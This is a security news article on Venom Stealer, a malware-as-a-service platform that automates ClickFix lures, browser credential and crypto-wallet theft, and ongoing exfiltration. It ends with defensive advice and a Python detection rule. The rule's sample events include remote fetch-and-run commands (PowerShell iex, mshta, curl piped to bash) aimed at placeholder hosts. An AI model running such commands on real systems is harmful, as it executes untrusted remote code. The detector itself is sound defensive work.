ClickFix Attacks Go Fully Automated With a New MaaS Offering
Crafting sophisticated ClickFix-style attacks no longer requires deep technical expertise. A newly identified malware-as-a-service (MaaS) platform called Venom Stealer has emerged on cybercriminal forums, automating every phase of the social engineering technique and placing powerful credential-theft capabilities within reach of nearly any would-be attacker. Researchers at BlackFog disclosed details about the platform in a report published on Tuesday, April 1, 2026.
The developer behind the service operates under the alias "VenomStealer" and markets the platform across criminal underground networks. According to BlackFog founder and CEO Darren Williams, Venom Stealer is not simply another commodity infostealer — it represents a more complete and persistent attack pipeline than tools like Lumma, Vidar, and RedLine.
"Venom stands out from commodity stealers like Lumma, Vidar, and RedLine because it goes beyond credential harvesting. It builds ClickFix social engineering directly into the operator panel, automates every step after initial access, and creates a continuous exfiltration pipeline that does not end when the initial payload finishes running." — Darren Williams, BlackFog
Pricing, Licensing, and Business Structure
Touted on cybercriminal forums as "the Apex Predator of Wallet Extraction," Venom Stealer is sold on a subscription model priced at $250 per month or $1,800 for lifetime access. The operation includes a vetted application process, Telegram-based licensing, and a 15% affiliate program. Operators receive a native C++ binary payload compiled specifically for them through the platform's web panel.
Despite being a relatively recent entrant to the MaaS market, the operation behind Venom Stealer already shows signs of active development. Williams noted that during March 2026 alone, the developer shipped multiple updates to the platform, suggesting a well-maintained and actively evolving criminal enterprise.
How the Attack Chain Works
Step 1: The ClickFix Lure
An attack begins when a target lands on a ClickFix page hosted by the operator. The platform ships four templates per platform — covering both Windows and macOS — including:
- A fake Cloudflare CAPTCHA page
- A fake operating system update prompt
- A fake SSL certificate error
- A fake font installation page
Each template instructs the victim to open a Run dialog or Terminal window, copy and paste a command, and press Enter. As Williams explained, because the target personally initiates the execution, the process appears user-initiated and bypasses detection logic built around parent-child process relationships.
Step 2: Payload Delivery
On Windows, the available payload formats include .exe, .ps1 (or fileless via PowerShell), .hta, and .bat options. macOS templates rely on bash and curl. Operators can also configure custom domains through Cloudflare DNS, ensuring the panel URL never appears directly in the delivered command — a technique designed to obscure the infrastructure behind the attack.
Step 3: Credential and Data Harvesting
Once the payload executes, it sweeps every Chromium and Firefox-based browser on the machine. Extracted data includes saved passwords, session cookies, browsing history, autofill data, and cryptocurrency wallet vaults from every browser profile present.
Particularly notable are the evasion capabilities built into the payload's execution. The encryption protecting credentials in Chrome (the v10 and v20 formats Chrome uses for stored passwords and cookies) is bypassed through a silent privilege escalation technique that extracts the decryption key without triggering any User Account Control (UAC) dialog, leaving no forensic artifacts behind. The attack chain also captures system fingerprinting data and browser extension inventories, giving operators a complete profile of each compromised target.
"All of this data leaves the infected device immediately, with little or no local staging or delay. Without adequate visibility into outbound traffic, detecting this activity becomes significantly more difficult." — Darren Williams, BlackFog
Persistent Post-Compromise Pipeline
Automated Cryptocurrency Wallet Cracking
Any cryptocurrency wallet data discovered during the sweep is transferred to a server-side, GPU-powered cracking engine that automatically targets wallets from a wide range of platforms, including:
- MetaMask
- Phantom
- Solflare
- Trust Wallet
- Atomic
- Exodus
- Electrum
- Bitcoin Core
- Monero
- Tonkeeper
A March 9 update to Venom Stealer added a File Password and Seed Finder feature, which searches the entire filesystem for locally saved seed phrases and feeds anything found into the cracking pipeline. Williams warned that even users who avoid storing credentials in their browsers remain at risk if seed phrases exist anywhere on their machine.
Real-Time Credential Monitoring
Unlike most infostealers that execute once and exit, Venom Stealer maintains persistence after the initial compromise. It continuously monitors Chrome's Login Data file, capturing newly saved credentials in real time. According to Williams, this undermines credential rotation as an incident response strategy and extends the exfiltration window far beyond the initial infection event.
"This undermines credential rotation as an incident response measure and extends the exfiltration window beyond the initial infection. As a result, determining the full scope of the ongoing compromise becomes more difficult." — Darren Williams, BlackFog
Background: The Rise of ClickFix Attacks
Researchers from Proofpoint first identified ClickFix attacks approximately two years ago. Since then, the technique has gained significant traction across the cybercriminal community. The method works by instilling urgency in targets — telling them something is broken and must be fixed or updated — while using CAPTCHA-style prompts to create a false sense of legitimacy. The ultimate goal is to manipulate users into executing malicious commands against themselves, turning the victim into an unwitting accomplice in their own compromise.
Defensive Measures Organizations Can Take
Williams outlined several concrete steps organizations can take to reduce their exposure to platforms like Venom Stealer:
- Restrict PowerShell execution to prevent fileless payload delivery.
- Disable the Run dialog for standard users via Group Policy to block a key initial execution vector.
- Train employees to recognize ClickFix-style social engineering, particularly fake CAPTCHA pages and software update prompts.
- Monitor and control outbound traffic to detect or block data exfiltration activity after an initial compromise.
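The Step 1 note above explains why ClickFix execution slips past parent-child process logic: the interpreter is spawned by explorer.exe (Run dialog) or Terminal, so it looks like the user started it. The detection rule below, an added example and not BlackFog's or Dark Reading's code, turns that around and hunts for exactly that shape: an interactive parent launching one of the interpreters the templates rely on with a command line that fetches or decodes remote content. The events are constructed in the shape of Sysmon Event ID 1 telemetry; the example.invalid hostnames and script paths are placeholders.

```python
import re

# Constructed process-creation events (parent image, child image, command line).
# These are not real logs; the hostnames are placeholders.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr https://example.invalid/v -UseBasicParsing | iex"'},
    {"parent": "explorer.exe", "image": "mshta.exe",
     "cmdline": "mshta https://example.invalid/update.hta"},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell -NoProfile -File C:\\Scripts\\backup.ps1"},   # benign admin launch
    {"parent": "Terminal", "image": "bash",
     "cmdline": 'bash -c "curl -fsSL https://example.invalid/f | bash"'},
    {"parent": "services.exe", "image": "powershell.exe",
     "cmdline": "powershell -enc SQBFAFgA"},                              # not interactive; other rules cover it
]

# Parents that mean "a person typed this": Run dialog / Start menu launches are
# children of explorer.exe on Windows; pasted commands on macOS come from Terminal.
INTERACTIVE_PARENTS = {"explorer.exe", "terminal"}
# Interpreters the ClickFix templates use (PowerShell, HTA, batch on Windows; bash/curl on macOS).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "bash", "sh", "zsh", "curl"}
# Cues that the typed command pulls in or decodes remote content.
REMOTE_CUES = re.compile(
    r"(https?://|\biwr\b|invoke-webrequest|invoke-expression|\biex\b|downloadstring|"
    r"-enc(odedcommand)?\b|\bcurl\b|\bwget\b)",
    re.IGNORECASE,
)


def classify(event):
    """Return a short reason if the event matches the ClickFix execution shape, else None."""
    parent = event["parent"].lower()
    image = event["image"].lower()
    if parent not in INTERACTIVE_PARENTS or image not in INTERPRETERS:
        return None
    hit = REMOTE_CUES.search(event["cmdline"])
    if hit is None:
        return None
    return f"{parent} -> {image} with remote-content cue '{hit.group(0)}'"


def scan(events):
    """Return (cmdline, reason) pairs for every event the rule flags."""
    return [(e["cmdline"], r) for e in events if (r := classify(e)) is not None]


if __name__ == "__main__":
    for cmdline, reason in scan(SAMPLE_EVENTS):
        print(f"ALERT: {reason}\n    {cmdline}")
```

The rule deliberately leaves the services.exe-spawned encoded command alone; that case is what conventional parent-child logic already catches, and the point here is the interactive launch it misses.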
As Williams put it: "Once the payload is running, the attack chain depends on data leaving the device. Monitoring and controlling outbound traffic become important at this point, because it provides an opportunity to detect or prevent exfiltration activity and limit the impact of credential theft and subsequent actions."
The commoditization of ClickFix attacks through platforms like Venom Stealer signals a continued lowering of the barrier to entry for sophisticated, multi-stage credential theft campaigns — making employee awareness and robust outbound traffic controls more critical than ever.
Source: Dark Reading